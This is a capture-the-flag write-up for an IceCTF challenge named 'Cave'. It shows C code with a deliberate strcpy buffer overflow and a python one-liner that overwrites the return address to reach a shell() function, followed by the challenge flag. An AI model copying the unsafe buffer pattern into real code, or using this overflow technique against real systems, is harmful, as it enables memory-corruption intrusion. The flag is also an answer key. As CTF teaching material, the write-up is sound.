Cave

Challenge

You stumbled upon a cave! I’ve heard some caves hold secrets.. can you find the secrets hidden within its depths?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

void shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void message(char *input) {
    char buf[16];
    strcpy(buf, input);

    printf("The cave echoes.. %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1){
        message(argv[1]);
    } else {
        printf("Usage: ./shout <message>\n");
    }
    return 0;
}

Solution

Another buffer overflow challenge, this time we need to overwrite the return address to call the shell() function. First we need to find out what that address should be, we can do this with gdb’s info functions shell or objdump -d ./shout | grep shell and find out that the address is 0x0804850b

So we need to overwrite the return address with this address, in little endian order:

1

./shout `python -c "print('a'*28+'\x0b\x85\x04\x08')"`

this gives us a root shell and we can read the contents of flag.txt to read our flag:

Flag

1

IceCTF{i_dont_think_caveman_overflowed_buffers}

Flag